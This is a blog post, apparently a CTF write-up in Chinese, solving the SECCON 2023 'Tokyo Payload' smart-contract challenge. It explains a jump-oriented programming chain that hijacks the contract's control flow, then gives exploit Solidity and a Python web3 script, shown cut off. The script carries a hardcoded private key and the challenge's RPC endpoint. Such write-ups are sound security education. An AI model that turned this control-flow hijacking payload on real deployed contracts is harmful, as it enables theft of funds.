<!DOCTYPE html>
<html lang="en">
    <head>
    <meta charset="utf-8">

    

    <!-- 渲染优化 -->
    <meta name="renderer" content="webkit">
    <meta name="force-rendering" content="webkit">
    <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
    <meta name="HandheldFriendly" content="True" >
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

    <!--icon-->

    
    
    
    
    


    <!-- meta -->


<title>SECCON 2023 Tokyo Payload | arcovegle&#39;s blog</title>


    <meta name="keywords" content="writeup, blockchain">




    <!-- OpenGraph -->
 
    <meta name="description" content="Preface Source code analysis Let’s do JOP My solution Deployed contract All in one exp    Preface这次 Quals 队里打了第三，由于逆向部分的题目偏简单，没有可圈可点的题目，因此没有专门写 Reverse 部分的 Writeup。和队友 AK 完逆向后，便转过头来看了这道 blockchain，通宵">
<meta property="og:type" content="article">
<meta property="og:title" content="SECCON 2023 Tokyo Payload">
<meta property="og:url" content="http://arcovegle.github.io/2023/09/20/SECCON%202023%20Tokyo%20Payload/index.html">
<meta property="og:site_name" content="arcovegle&#39;s blog">
<meta property="og:description" content="Preface Source code analysis Let’s do JOP My solution Deployed contract All in one exp    Preface这次 Quals 队里打了第三，由于逆向部分的题目偏简单，没有可圈可点的题目，因此没有专门写 Reverse 部分的 Writeup。和队友 AK 完逆向后，便转过头来看了这道 blockchain，通宵">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://arcovegle.github.io/2023/09/20/SECCON%202023%20Tokyo%20Payload/challenge.png">
<meta property="article:published_time" content="2023-09-20T13:53:19.000Z">
<meta property="article:modified_time" content="2023-09-21T02:25:39.112Z">
<meta property="article:author" content="arcovegle">
<meta property="article:tag" content="writeup">
<meta property="article:tag" content="blockchain">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://arcovegle.github.io/2023/09/20/SECCON%202023%20Tokyo%20Payload/challenge.png">


    
<link rel="stylesheet" href="/css/style/main.css">
 

    
    
    
    
        <link rel="stylesheet" id="hl-default-theme" href="/css/themes/prism.css" media="none" >
        
            <link rel="stylesheet" id="hl-dark-theme" href="/css/themes/prism-tomorrow.css" media="none">
        
    
    


    
    
<link rel="stylesheet" href="/css/style/dark.css">

    
<script src="/js/darkmode.js"></script>



     

    <!-- custom head -->

<meta name="generator" content="Hexo 6.3.0"></head>

    <body>
        <div id="app" tabindex="-1">
            <header class="header">
    <div class="header__left">
        <a href="/" class="button">
            <span class="logo__text">arcovegle&#39;s blog</span>
        </a>
    </div>
    <div class="header__right">
        
            <div class="navbar__menus">
                
                    <a href="/" class="navbar-menu button">Home</a>
                
                    <a href="/archives/" class="navbar-menu button">Archives</a>
                
                    <a href="/about/" class="navbar-menu button">About</a>
                
            </div>
        
        
        
    <a href="/search/" id="btn-search">
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1024 1024" width="24" height="24" fill="currentColor" stroke="currentColor" stroke-width="32"><path d="M192 448c0-141.152 114.848-256 256-256s256 114.848 256 256-114.848 256-256 256-256-114.848-256-256z m710.624 409.376l-206.88-206.88A318.784 318.784 0 0 0 768 448c0-176.736-143.264-320-320-320S128 271.264 128 448s143.264 320 320 320a318.784 318.784 0 0 0 202.496-72.256l206.88 206.88 45.248-45.248z"></path></svg>
    </a>


        
        
    <a href="javaScript:void(0);" id="btn-toggle-dark">
        <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M21 12.79A9 9 0 1 1 11.21 3 7 7 0 0 0 21 12.79z"></path></svg>
    </a>


        
            <a class="dropdown-icon button" id="btn-dropdown" tabindex="0"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 20 20" width='24' height='24' fill="none" stroke="currentColor" stroke-width="0.7" stroke-linecap="round" stroke-linejoin="round"><path fill="currentColor" d="M3.314,4.8h13.372c0.41,0,0.743-0.333,0.743-0.743c0-0.41-0.333-0.743-0.743-0.743H3.314c-0.41,0-0.743,0.333-0.743,0.743C2.571,4.467,2.904,4.8,3.314,4.8z M16.686,15.2H3.314c-0.41,0-0.743,0.333-0.743,0.743s0.333,0.743,0.743,0.743h13.372c0.41,0,0.743-0.333,0.743-0.743S17.096,15.2,16.686,15.2z M16.686,9.257H3.314c-0.41,0-0.743,0.333-0.743,0.743s0.333,0.743,0.743,0.743h13.372c0.41,0,0.743-0.333,0.743-0.743S17.096,9.257,16.686,9.257z"></path></svg></a>
            <div class="dropdown-menus" id="dropdown-menus">
                
                    <a href="/" class="dropdown-menu button">Home</a>
                
                    <a href="/archives/" class="dropdown-menu button">Archives</a>
                
                    <a href="/about/" class="dropdown-menu button">About</a>
                
            </div>
        
    </div>
</header>


            <main class="main">
    

<div class="post-title">
    <h1 class="post-title__text">
        SECCON 2023 Tokyo Payload
    </h1>
    <div class="post-title__meta">
        <a href="/archives/2023/09/" class="post-meta__date button">2023-09-20</a>
        
 
        
    
    


 

 
    </div>
</div>



<article class="post content-card">
    <div class="post__header"></div>
    <div class="post__content">
        <ul>
<li><a href="#Preface">Preface</a></li>
<li><a href="#Source-code-analysis">Source code analysis</a></li>
<li><a href="#Let%E2%80%99s-do-JOP">Let’s do JOP</a></li>
<li><a href="#My-solution">My solution</a><ul>
<li><a href="#Deployed-contract">Deployed contract</a></li>
<li><a href="#All-in-one-exp">All in one exp</a></li>
</ul>
</li>
</ul>
<h2 id="Preface"><a href="#Preface" class="headerlink" title="Preface"></a>Preface</h2><p>这次 Quals 队里打了第三，由于逆向部分的题目偏简单，没有可圈可点的题目，因此没有专门写 Reverse 部分的 Writeup。和队友 AK 完逆向后，便转过头来看了这道 blockchain，通宵写完了 exploit，也达成了比赛中第一次提交 blockchain 方向题目的成就。</p>
<p><img src="/2023/09/20/SECCON%202023%20Tokyo%20Payload/challenge.png" class="lazy" data-srcset="/2023/09/20/SECCON%202023%20Tokyo%20Payload/challenge.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABAQMAAAAl21bKAAAABlBMVEXMzMyWlpYU2uzLAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAACklEQVQImWNgAAAAAgAB9HFkpgAAAABJRU5ErkJggg==" alt="challenge"></p>
<h2 id="Source-code-analysis"><a href="#Source-code-analysis" class="headerlink" title="Source code analysis"></a>Source code analysis</h2><p>题目合约源码：</p>
<pre class="language-solidity" data-language="solidity"><code class="language-solidity"><span class="token comment">// SPDX-License-Identifier: Apache-2.0</span>
<span class="token keyword">pragma</span> <span class="token keyword">solidity</span> <span class="token number">0.8</span><span class="token number">.21</span><span class="token punctuation">;</span>

<span class="token keyword">contract</span> <span class="token class-name">TokyoPayload</span> <span class="token punctuation">&#123;</span>
    <span class="token builtin">bool</span> <span class="token keyword">public</span> solved<span class="token punctuation">;</span>
    <span class="token builtin">uint256</span> <span class="token keyword">public</span> gasLimit<span class="token punctuation">;</span>

    <span class="token keyword">function</span> <span class="token function">tokyoPayload</span><span class="token punctuation">(</span><span class="token builtin">uint256</span> x<span class="token punctuation">,</span> <span class="token builtin">uint256</span> y<span class="token punctuation">)</span> <span class="token keyword">public</span> <span class="token punctuation">&#123;</span>
        <span class="token keyword">require</span><span class="token punctuation">(</span>x <span class="token operator">>=</span> <span class="token number">0x40</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token function">resetGasLimit</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token keyword">assembly</span> <span class="token punctuation">&#123;</span>
            <span class="token function">calldatacopy</span><span class="token punctuation">(</span>x<span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">,</span> <span class="token function">calldatasize</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
        <span class="token punctuation">&#125;</span>
        <span class="token keyword">function</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token punctuation">]</span> <span class="token keyword">memory</span> funcs<span class="token punctuation">;</span>
        <span class="token builtin">uint256</span> z <span class="token operator">=</span> y<span class="token punctuation">;</span>
        funcs<span class="token punctuation">[</span>z<span class="token punctuation">]</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>

    <span class="token keyword">function</span> <span class="token function">load</span><span class="token punctuation">(</span><span class="token builtin">uint256</span> i<span class="token punctuation">)</span> <span class="token keyword">public</span> <span class="token keyword">pure</span> <span class="token keyword">returns</span> <span class="token punctuation">(</span><span class="token builtin">uint256</span> a<span class="token punctuation">,</span> <span class="token builtin">uint256</span> b<span class="token punctuation">,</span> <span class="token builtin">uint256</span> c<span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
        <span class="token keyword">assembly</span> <span class="token punctuation">&#123;</span>
            a <span class="token operator">:=</span> <span class="token function">calldataload</span><span class="token punctuation">(</span>i<span class="token punctuation">)</span>
            b <span class="token operator">:=</span> <span class="token function">calldataload</span><span class="token punctuation">(</span><span class="token function">add</span><span class="token punctuation">(</span>i<span class="token punctuation">,</span> <span class="token number">0x20</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
            c <span class="token operator">:=</span> <span class="token function">calldataload</span><span class="token punctuation">(</span><span class="token function">add</span><span class="token punctuation">(</span>i<span class="token punctuation">,</span> <span class="token number">0x40</span><span class="token punctuation">)</span><span class="token punctuation">)</span>
        <span class="token punctuation">&#125;</span>
    <span class="token punctuation">&#125;</span>

    <span class="token keyword">function</span> <span class="token function">createArray</span><span class="token punctuation">(</span><span class="token builtin">uint256</span> length<span class="token punctuation">)</span> <span class="token keyword">public</span> <span class="token keyword">pure</span> <span class="token keyword">returns</span> <span class="token punctuation">(</span><span class="token builtin">uint256</span><span class="token punctuation">[</span><span class="token punctuation">]</span> <span class="token keyword">memory</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
        <span class="token keyword">return</span> <span class="token keyword">new</span> <span class="token class-name">uint256</span><span class="token punctuation">[</span><span class="token punctuation">]</span><span class="token punctuation">(</span>length<span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>

    <span class="token keyword">function</span> <span class="token function">resetGasLimit</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token keyword">public</span> <span class="token punctuation">&#123;</span>
        <span class="token builtin">uint256</span><span class="token punctuation">[</span><span class="token punctuation">]</span> <span class="token keyword">memory</span> arr<span class="token punctuation">;</span>
        gasLimit <span class="token operator">=</span> arr<span class="token punctuation">.</span>length<span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>

    <span class="token keyword">function</span> <span class="token function">delegatecall</span><span class="token punctuation">(</span><span class="token builtin">address</span> addr<span class="token punctuation">)</span> <span class="token keyword">public</span> <span class="token punctuation">&#123;</span>
        <span class="token keyword">require</span><span class="token punctuation">(</span>msg<span class="token punctuation">.</span>sender <span class="token operator">==</span> <span class="token builtin">address</span><span class="token punctuation">(</span><span class="token number">0xCAFE</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">(</span><span class="token builtin">bool</span> success<span class="token punctuation">,</span><span class="token punctuation">)</span> <span class="token operator">=</span> addr<span class="token punctuation">.</span>delegatecall<span class="token punctuation">&#123;</span>gas<span class="token punctuation">:</span> gasLimit <span class="token operator">&amp;</span> <span class="token number">0xFFFF</span><span class="token punctuation">&#125;</span><span class="token punctuation">(</span><span class="token string">""</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token keyword">require</span><span class="token punctuation">(</span>success<span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span></code></pre>

<p>分析合约的 Solidity 源码后，很快便可以得出最终需要通过 <code>delegatecall</code> 将 solved 置为 true 这样大致的利用思路，关键在于如何绕过合约对 <code>msg.sender</code> 的检查以及对 gas 的限制。</p>
<p>进一步分析其他函数，可以看到与 gas 相关的 <code>gasLimit</code> 这一 storage 仅在 <code>resetGasLimit</code> 这一函数与调用该函数的 <code>tokyoPayload</code> 函数中存在对其写入，且写入值 <code>arr.length</code> 默认为 0。余下的两个函数 <code>load</code> 与 <code>createArray</code> 目前来看不起任何作用，因为我们知道在一笔交易结束后，memory 中的值是会被清空的，并不会影响到下一次交易。</p>
<h2 id="Let’s-do-JOP"><a href="#Let’s-do-JOP" class="headerlink" title="Let’s do JOP"></a>Let’s do JOP</h2><p>于是我们把目光转向 <code>tokyoPayload</code> 函数，在该函数末尾声明了一个类型为 <code>function()</code> 的 memory 数组，随后取下标为 y 的元素进行函数调用。</p>
<p>这里需要了解一点预备知识，即合约中的 internal call 在 EVM bytecode 层面对应一条 <code>JUMP</code> 指令。开启题目环境并获取合约的 bytecode 后，结合在 <a target="_blank" rel="noopener" href="https://www.evm.codes/playground?fork=shanghai">EVM Playground</a> 中调试的结果，我们可以得知以下信息：</p>
<ol>
<li>记 calldata 长度为 len, 则对于 x 有: x ≥ 0x40, memory[x:x+len] &#x3D; calldata[:len]</li>
<li>对于 y 有: y ≤ memory[0x60:0x80] (MLOAD(0x60)), t &#x3D; (y * 0x20 + 0x80) &amp; 0xffffffff</li>
<li>对于在 2 中计算得到的 t, 最终会将 memory[t:t+0x20] (MLOAD(t)) 的值加载到栈顶，作为 <code>JUMP</code> 指令的跳转地址</li>
</ol>
<p>自此，通过合理设计调用 <code>tokyoPayload</code> 函数的 calldata，可以实现对合约内任意 <code>JUMPDEST</code> 的跳转。</p>
<p>回顾一下上一小节，要将 solved 置为 true，我们首先要实现以下两点前置要求：</p>
<ol>
<li>设置 <code>gasLimit</code> 为合理值，使得 <code>delegatecall</code> 调用时有足够的 gas 执行 <code>SSTORE</code> 指令</li>
<li>绕过对 <code>msg.sender</code> 的检查，实现对任意地址的 <code>delegatecall</code></li>
</ol>
<p>综上，考虑使用 JOP (Jump Oriented Programming) 劫持合约控制流。</p>
<h2 id="My-solution"><a href="#My-solution" class="headerlink" title="My solution"></a>My solution</h2><p>同 ROP 的原理类似，我们需要找到合适的 gadgets 以实现对栈上数据的布置。通过搜索反汇编后的 <code>SSTORE</code> 指令，发现有两个 gadgets 可以达到写 <code>gasLimit</code> 对应 storage 的目的，分别为 0xb7 与 0x153 处的 <code>JUMPDEST</code>，不同的是，0xb7 处的 gadgets 执行后会固定跳转到 0x93 从而 <code>STOP</code> 结束合约调用。</p>
<p>事实上，若采用 0xb7 处的 gadgets，利用过程就要拆分成两步进行，然而再次调用 <code>tokyoPayload</code> 函数，<code>gasLimit</code> 又会被重新置为 0 导致上一笔交易失效。因此，我们只能使用 0x153 处的 gadgets。</p>
<p>细心的你也许会发现，0x153 是 <code>tokyoPayload</code> 函数中间的一段 gadgets，等同于我们重入了该函数，自然执行到函数末尾时，我们又可以获得另外一个任意 <code>JUMPDEST</code> 的跳转。</p>
<p>接下来需要做的是对栈上数据的布置，<code>load</code> 函数内部的 gadgets 可以通过三个 <code>calldataload</code> 指令将 calldata 中指定偏移的数据加载到栈上，从而实现对栈数据尽可能的控制，对应 gadgets 位于 0xd0 处；最终执行 <code>delegatecall</code> 指令对应的 gadgets 位于 0x1a3 处。</p>
<p>最终的 JOP chain 中还添加了 0x18f 处与 0x93 处的 gadgets，分别起到栈清理与正常退出合约的作用：<code>tokyoPayload</code> → 0x153 → 0x18f → 0xd0 → 0x1a3 → 0x93</p>
<h3 id="Deployed-contract"><a href="#Deployed-contract" class="headerlink" title="Deployed contract"></a>Deployed contract</h3><p>inline assembly 节省 gas，如果限制苛刻可以手写 bytecode 优化</p>
<pre class="language-solidity" data-language="solidity"><code class="language-solidity"><span class="token keyword">pragma</span> <span class="token keyword">solidity</span> <span class="token number">0.8</span><span class="token number">.21</span><span class="token punctuation">;</span>

<span class="token keyword">contract</span> <span class="token class-name">Exploit</span> <span class="token punctuation">&#123;</span>
    <span class="token builtin">bool</span> <span class="token keyword">public</span> solved<span class="token punctuation">;</span>

    <span class="token function">fallback</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token keyword">external</span> <span class="token punctuation">&#123;</span>
        <span class="token keyword">assembly</span> <span class="token punctuation">&#123;</span>
            <span class="token function">sstore</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">,</span> <span class="token number">1</span><span class="token punctuation">)</span>
        <span class="token punctuation">&#125;</span>
    <span class="token punctuation">&#125;</span>
<span class="token punctuation">&#125;</span></code></pre>

<h3 id="All-in-one-exp"><a href="#All-in-one-exp" class="headerlink" title="All in one exp"></a>All in one exp</h3><p>注：gasLimit 被设置为 0xc300，足以完成将 solved 置 1</p>
<pre class="language-python" data-language="python"><code class="language-python"><span class="token keyword">import</span> rlp
<span class="token keyword">import</span> struct

<span class="token keyword">from</span> web3 <span class="token keyword">import</span> Web3

<span class="token keyword">def</span> <span class="token function">setup_payload</span><span class="token punctuation">(</span>x<span class="token punctuation">,</span> y<span class="token punctuation">,</span> target0<span class="token punctuation">,</span> target1<span class="token punctuation">,</span> target3<span class="token punctuation">,</span> target4<span class="token punctuation">,</span> contract_address<span class="token punctuation">)</span><span class="token punctuation">:</span> <span class="token comment"># y is also target2</span>
    length <span class="token operator">=</span> <span class="token builtin">max</span><span class="token punctuation">(</span>y <span class="token operator">*</span> <span class="token number">0x20</span> <span class="token operator">+</span> <span class="token number">0xa0</span> <span class="token operator">-</span> x<span class="token punctuation">,</span> <span class="token number">0x3280</span> <span class="token operator">-</span> y<span class="token punctuation">)</span>
    selector <span class="token operator">=</span> struct<span class="token punctuation">.</span>pack<span class="token punctuation">(</span><span class="token string">'>I'</span><span class="token punctuation">,</span> <span class="token number">0x40c3</span><span class="token punctuation">)</span>
    jdest0 <span class="token operator">=</span> target0<span class="token punctuation">.</span>to_bytes<span class="token punctuation">(</span><span class="token number">0x20</span><span class="token punctuation">,</span> <span class="token string">'big'</span><span class="token punctuation">)</span>
    jdest1 <span class="token operator">=</span> target1<span class="token punctuation">.</span>to_bytes<span class="token punctuation">(</span><span class="token number">0x20</span><span class="token punctuation">,</span> <span class="token string">'big'</span><span class="token punctuation">)</span>
    calldata <span class="token operator">=</span> <span class="token builtin">bytearray</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span>rjust<span class="token punctuation">(</span>length<span class="token punctuation">,</span> <span class="token string">b'\x00'</span><span class="token punctuation">)</span>
    calldata<span class="token punctuation">[</span><span class="token punctuation">:</span><span class="token number">4</span><span class="token punctuation">]</span> <span class="token operator">=</span> selector
    calldata<span class="token punctuation">[</span><span class="token number">4</span><span class="token punctuation">:</span><span class="token number">0x24</span><span class="token punctuation">]</span> <span class="token operator">=</span> x<span class="token punctuation">.</span>to_bytes<span class="token punctuation">(</span><span class="token number">0x20</span><span class="token punctuation">,</span> <span class="token string">'big'</span><span class="token punctuation">)</span>
    calldata<span class="token punctuation">[</span><span class="token number">0x24</span><span class="token punctuation">:</span><span class="token number">0x44</span><span class="token punctuation">]</span> <span class="token operator">=</span> y<span class="token punctuation">.</span>to_bytes<span class="token punctuation">(</span><span class="token number">0x20</span><span class="token punctuation">,</span> <span class="token string">'big'</span><span class="token punctuation">)</span>
    calldata<span class="token punctuation">[</span>y <span class="token operator">*</span> <span class="token number">0x20</span> <span class="token operator">+</span> <span class="token number">0x80</span> <span class="token operator">-</span> x<span class="token punctuation">:</span>y <span class="token operator">*</span> <span class="token number">0x20</span> <span class="token operator">+</span> <span class="token number">0xa0</span> <span class="token operator">-</span> x<span class="token punctuation">]</span> <span class="token operator">=</span> jdest0
    calldata<span class="token punctuation">[</span><span class="token number">0x3260</span> <span class="token operator">-</span> y<span class="token punctuation">:</span><span class="token number">0x3280</span> <span class="token operator">-</span> y<span class="token punctuation">]</span> <span class="token operator">=</span> jdest1
    calldata<span class="token punctuation">[</span><span class="token number">0x80</span><span class="token punctuation">:</span><span class="token number">0xa0</span><span class="token punctuation">]</span> <span class="token operator">=</span> target3<span class="token punctuation">.</span>to_bytes<span class="token punctuation">(</span><span class="token number">0x20</span><span class="token punctuation">,</span> <span class="token string">'big'</span><span class="token punctuation">)</span>
    calldata<span class="token punctuation">[</span><span class="token number">0xa0</span><span class="token punctuation">:</span><span class="token number">0xc0</span><span class="token punctuation">]</span> <span class="token operator">=</span> <span class="token number">0x1000</span><span class="token punctuation">.</span>to_bytes<span class="token punctuation">(</span><span class="token number">0x20</span><span class="token punctuation">,</span> <span class="token string">'big'</span><span class="token punctuation">)</span>
    calldata<span class="token punctuation">[</span><span class="token number">0x1020</span><span class="token punctuation">:</span><span class="token number">0x1040</span><span class="token punctuation">]</span> <span class="token operator">=</span> target4<span class="token punctuation">.</span>to_bytes<span class="token punctuation">(</span><span class="token number">0x20</span><span class="token punctuation">,</span> <span class="token string">'big'</span><span class="token punctuation">)</span>
    calldata<span class="token punctuation">[</span><span class="token number">0x1040</span><span class="token punctuation">:</span><span class="token number">0x1060</span><span class="token punctuation">]</span> <span class="token operator">=</span> contract_address<span class="token punctuation">.</span>to_bytes<span class="token punctuation">(</span><span class="token number">0x20</span><span class="token punctuation">,</span> <span class="token string">'big'</span><span class="token punctuation">)</span>
    <span class="token keyword">return</span> calldata

<span class="token keyword">def</span> <span class="token function">calculate_address</span><span class="token punctuation">(</span>deployer<span class="token punctuation">,</span> nonce<span class="token punctuation">)</span><span class="token punctuation">:</span>
    <span class="token keyword">return</span> Web3<span class="token punctuation">.</span>keccak<span class="token punctuation">(</span>rlp<span class="token punctuation">.</span>encode<span class="token punctuation">(</span><span class="token punctuation">[</span><span class="token builtin">bytes</span><span class="token punctuation">.</span>fromhex<span class="token punctuation">(</span>deployer<span class="token punctuation">[</span><span class="token number">2</span><span class="token punctuation">:</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">,</span> nonce<span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">[</span><span class="token number">12</span><span class="token punctuation">:</span><span class="token punctuation">]</span><span class="token punctuation">.</span><span class="token builtin">hex</span><span class="token punctuation">(</span><span class="token punctuation">)</span>

<span class="token comment"># 1. Add the Web3 provider logic here:</span>
rpc_endpoint <span class="token operator">=</span> <span class="token string">'http://tokyo-payload.seccon.games:8545/c731cd1b-dc79-426f-bce7-0fe523665bf6'</span>
web3 <span class="token operator">=</span> Web3<span class="token punctuation">(</span>Web3<span class="token punctuation">.</span>HTTPProvider<span class="token punctuation">(</span>rpc_endpoint<span class="token punctuation">)</span><span class="token punctuation">)</span>

<span class="token keyword">assert</span> web3<span class="token punctuation">.</span>is_connected<span class="token punctuation">(</span><span class="token punctuation">)</span>

setup_contract <span class="token operator">=</span> <span class="token string">'0x9e7237f54BC42923E971c43e132D9377E1b5fE9c'</span>

victim_contract <span class="token operator">=</span> calculate_address<span class="token punctuation">(</span>setup_contract<span class="token punctuation">,</span> web3<span class="token punctuation">.</span>eth<span class="token punctuation">.</span>get_transaction_count<span class="token punctuation">(</span>setup_contract<span class="token punctuation">)</span> <span class="token operator">-</span> <span class="token number">1</span><span class="token punctuation">)</span>

<span class="token comment"># code = web3.eth.get_code(Web3.to_checksum_address(victim_contract)).hex()</span>
<span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string-interpolation"><span class="token string">f'Our Vicitim contract address: </span><span class="token interpolation"><span class="token punctuation">&#123;</span> Web3<span class="token punctuation">.</span>to_checksum_address<span class="token punctuation">(</span>victim_contract<span class="token punctuation">)</span> <span class="token punctuation">&#125;</span></span><span class="token string">'</span></span><span class="token punctuation">)</span>

<span class="token comment"># 2. Add contract bytecode here:</span>
bytecode <span class="token operator">=</span> <span class="token string">"608060405234801561000f575f80fd5b5060bf8061001c5f395ff3fe6080604052348015600e575f80fd5b50600436106029575f3560e01c8063799320bb14603057602a565b5b60015f55005b6036604a565b604051604191906072565b60405180910390f35b5f8054906101000a900460ff1681565b5f8115159050919050565b606c81605a565b82525050565b5f60208201905060835f8301846065565b9291505056fea2646970667358221220956a931490b36fa29544530fe3ccb1b0e368513f67b899d0d65bf352f8ffadc064736f6c63430008150033"</span>

<span class="token comment"># 3. Create address variable</span>
account_from <span class="token operator">=</span> <span class="token punctuation">&#123;</span>
    <span class="token string">'private_key'</span><span class="token punctuation">:</span> <span class="token string">'0x05e6667d8b67ce0b50d3e5b0b07c0be7d1495b6100f864fc1de352f24d7baab4'</span><span class="token punctuation">,</span>
    <span class="token string">'address'</span><span class="token punctuation">:</span> <span class="token string">'0x36b80798f3a59f36CAA0E3345b6BfF794d12bB24'</span>
<span class="token punctuation">&#125;</span>

<span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string-interpolation"><span class="token string">f'Attempting to deploy from account: </span><span class="token interpolation"><span class="token punctuation">&#123;</span> account_from<span class="token punctuation">[</span><span class="token string">"address"</span><span class="token punctuation">]</span> <span class="token punctuation">&#125;</span></span><span class="token string">'</span></span><span class="token punctuation">)</span>
<span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string-interpolation"><span class="token string">f'Contract will be deployed at address: </span><span class="token interpolation"><span class="token punctuation">&#123;</span> calculate_address<span class="token punctuation">(</span>account_from<span class="token punctuation">[</span><span class="token string">"address"</span><span class="token punctuation">]</span><span class="token punctuation">,</span> web3<span class="token punctuation">.</span>eth<span class="token punctuation">.</span>get_transaction_count<span class="token punctuation">(</span>account_from<span class="token punctuation">[</span><span class="token string">"address"</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token punctuation">&#125;</span></span><span class="token string">'</span></span><span class="token punctuation">)</span>

<span class="token comment"># 4. Build deploy tx</span>
deploy_tx <span class="token operator">=</span> <span class="token punctuation">&#123;</span>
    <span class="token string">'from'</span><span class="token punctuation">:</span> account_from<span class="token punctuation">[</span><span class="token string">'address'</span><span class="token punctuation">]</span><span class="token punctuation">,</span>
    <span class="token string">'to'</span><span class="token punctuation">:</span> <span class="token boolean">None</span><span class="token punctuation">,</span>
    <span class="token string">'nonce'</span><span class="token punctuation">:</span> web3<span class="token punctuation">.</span>eth<span class="token punctuation">.</span>get_transaction_count<span class="token punctuation">(</span>account_from<span class="token punctuation">[</span><span class="token string">'address'</span><span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
    <span class="token string">'gasPrice'</span><span class="token punctuation">:</span> web3<span class="token punctuation">.</span>eth<span class="token punctuation">.</span>gas_price<span class="token punctuation">,</span>
    <span class="token string">'value'</span><span class="token punctuation">:</span> <span class="token number">0</span><span class="token punctuation">,</span>
    <span class="token string">'data'</span><span class="token punctuation">:</span> bytecode<span class="token punctuation">,</span>
    <span class="token string">'chainId'</span><span class="token punctuation">:</span> web3<span class="token punctuation">.</span>eth<span class="token punctuation">.</span>chain_id<span class="token punctuation">,</span>
<span class="token punctuation">&#125;</span>
estimated_gas <span class="token operator">=</span> web3<span class="token punctuation">.</span>eth<span class="token punctuation">.</span>estimate_gas<span class="token punctuation">(</span>deploy_tx<span class="token punctuation">)</span>
deploy_tx<span class="token punctuation">.</span>update<span class="token punctuation">(</span><span class="token punctuation">&#123;</span><span class="token string">'gas'</span><span class="token punctuation">:</span> <span class="token builtin">round</span><span class="token punctuation">(</span>estimated_gas <span class="token operator">*</span> <span class="token number">1.2</span><span class="token punctuation">)</span><span class="token punctuation">&#125;</span><span class="token punctuation">)</span>

<span class="token comment"># 5. Sign tx with PK</span>
tx_create <span class="token operator">=</span> web3<span class="token punctuation">.</span>eth<span class="token punctuation">.</span>account<span class="token punctuation">.</span>sign_transaction<span class="token punctuation">(</span>deploy_tx<span class="token punctuation">,</span> account_from<span class="token punctuation">[</span><span class="token string">'private_key'</span><span class="token punctuation">]</span><span class="token punctuation">)</span>

<span class="token comment"># 6. Send tx and wait for receipt</span>
tx_hash <span class="token operator">=</span> web3<span class="token punctuation">.</span>eth<span class="token punctuation">.</span>send_raw_transaction<span class="token punctuation">(</span>tx_create<span class="token punctuation">.</span>rawTransaction<span class="token punctuation">)</span>
tx_receipt <span class="token operator">=</span> web3<span class="token punctuation">.</span>eth<span class="token punctuation">.</span>wait_for_transaction_receipt<span class="token punctuation">(</span>tx_hash<span class="token punctuation">)</span>

<span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string-interpolation"><span class="token string">f'Contract deployed at address: </span><span class="token interpolation"><span class="token punctuation">&#123;</span> tx_receipt<span class="token punctuation">.</span>contractAddress <span class="token punctuation">&#125;</span></span><span class="token string">'</span></span><span class="token punctuation">)</span>

contract_address <span class="token operator">=</span> tx_receipt<span class="token punctuation">.</span>contractAddress

<span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string-interpolation"><span class="token string">f'Making a call to contract at address: </span><span class="token interpolation"><span class="token punctuation">&#123;</span> contract_address <span class="token punctuation">&#125;</span></span><span class="token string">'</span></span><span class="token punctuation">)</span>

payload <span class="token operator">=</span> setup_payload<span class="token punctuation">(</span><span class="token number">0x7b</span><span class="token punctuation">,</span> <span class="token number">0xd0</span><span class="token punctuation">,</span> <span class="token number">0x153</span><span class="token punctuation">,</span> <span class="token number">0x18f</span><span class="token punctuation">,</span> <span class="token number">0x1a3</span><span class="token punctuation">,</span> <span class="token number">0x93</span><span class="token punctuation">,</span> <span class="token builtin">int</span><span class="token punctuation">(</span>contract_address<span class="token punctuation">,</span> <span class="token number">16</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token builtin">hex</span><span class="token punctuation">(</span><span class="token punctuation">)</span>

<span class="token comment"># 7. Build function tx</span>
solver_tx <span class="token operator">=</span> <span class="token punctuation">&#123;</span>
